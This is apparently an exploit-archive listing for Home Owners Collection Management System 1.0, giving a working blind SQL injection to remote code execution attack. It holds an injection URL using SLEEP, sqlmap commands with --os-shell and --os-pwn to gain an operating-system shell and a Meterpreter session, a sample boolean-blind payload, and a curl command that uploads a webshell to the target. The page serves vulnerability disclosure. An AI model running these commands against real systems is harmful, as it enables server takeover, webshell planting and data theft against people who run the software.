Home[1] Files[2] News[3] Contact[4] Add New[5]
- Home Owners Collection Management System 1.0 SQL Injection[6]
- Authored by Hejap Zairy[7]
-
Home Owners Collection Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for remote code execution.
- MD5 |
ee57cf3d919ca1169d4199c321c21f88 - Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (Blind SQLi to RCE)
# Date: 9/03/2022
# Exploit Author: Hejap Zairy
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows
# Steps
# 1.- Go to : http://192.168.56.1/cwms/?p=blogs/view_blog&id=3
# 2 - manual inject Blind SQli http://192.168.56.1/cwms/?p=blogs/view_blog&id=3%27&&SLEEP(5)&&%271
# 3 - SQLi To RCE r00t
# 4 - Ubload webshell
# 5 - Web Shell to meterpreter full tty shell
# Blind sqli to Rce
#Exploit
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-shell --eta --hex --dbms=mysql --technique=b
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: p=blogs/view_blog&id=3' AND 6447=6447-- hOiz
---
# ubload meterpreter metasploit
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-pwn --eta --hex --dbms=mysql --technique=b
or
curl -v -F "filename=@0day_hejap.php" http://192.168.56.1/tmpukpcj.php
# Proof and Exploit:
https://streamable.com/f07cug
File Tags
- ActiveX[18] (932)
- Advisory[19] (76,970)
- Arbitrary[20] (15,003)
- BBS[21] (2,859)
- Bypass[22] (1,534)
- CGI[23] (1,010)
- Code Execution[24] (6,579)
- Conference[25] (668)
- Cracker[26] (797)
- CSRF[27] (3,259)
- DoS[28] (21,646)
- Encryption[29] (2,325)
- Exploit[30] (49,405)
- File Inclusion[31] (4,128)
- File Upload[32] (934)
- Firewall[33] (821)
- Info Disclosure[34] (2,538)
- Intrusion Detection[35] (847)
- Java[36] (2,762)
- JavaScript[37] (791)
- Kernel[38] (5,955)
- Local[39] (13,937)
- Magazine[40] (586)
- Overflow[41] (12,088)
- Perl[42] (1,410)
- PHP[43] (5,032)
- Proof of Concept[44] (2,275)
- Protocol[45] (3,265)
- Python[46] (1,375)
- Remote[47] (29,480)
- Root[48] (3,439)
- Ruby[49] (574)
- Scanner[50] (1,629)
- Security Tool[51] (7,655)
- Shell[52] (3,029)
- Shellcode[53] (1,200)
- Sniffer[54] (878)
- Spoof[55] (2,072)
- SQL Injection[56] (15,932)
- TCP[57] (2,348)
- Trojan[58] (668)
- UDP[59] (866)
- Virus[60] (657)
- Vulnerability[61] (30,281)
- Web[62] (8,922)
- Whitepaper[63] (3,704)
- x86[64] (942)
- XSS[65] (17,251)
- Other[66]
File Archives
- March 2022[67]
- February 2022[68]
- January 2022[69]
- December 2021[70]
- November 2021[71]
- October 2021[72]
- September 2021[73]
- August 2021[74]
- July 2021[75]
- June 2021[76]
- May 2021[77]
- April 2021[78]
- Older[79]
Systems
- AIX[80] (424)
- Apple[81] (1,873)
- BSD[82] (368)
- CentOS[83] (55)
- Cisco[84] (1,911)
- Debian[85] (5,947)
- Fedora[86] (1,690)
- FreeBSD[87] (1,241)
- Gentoo[88] (4,152)
- HPUX[89] (876)
- iOS[90] (314)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (41,669)
- Mac OS X[95] (683)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (477)
- RedHat[99] (11,188)
- Slackware[100] (941)
- Solaris[101] (1,605)
- SUSE[102] (1,444)
- Ubuntu[103] (7,673)
- UNIX[104] (9,036)
- UnixWare[105] (183)
- Windows[106] (6,309)
- Other[107]
- Services
- Security Services[118]
- Hosting By
- Rokasec[119]


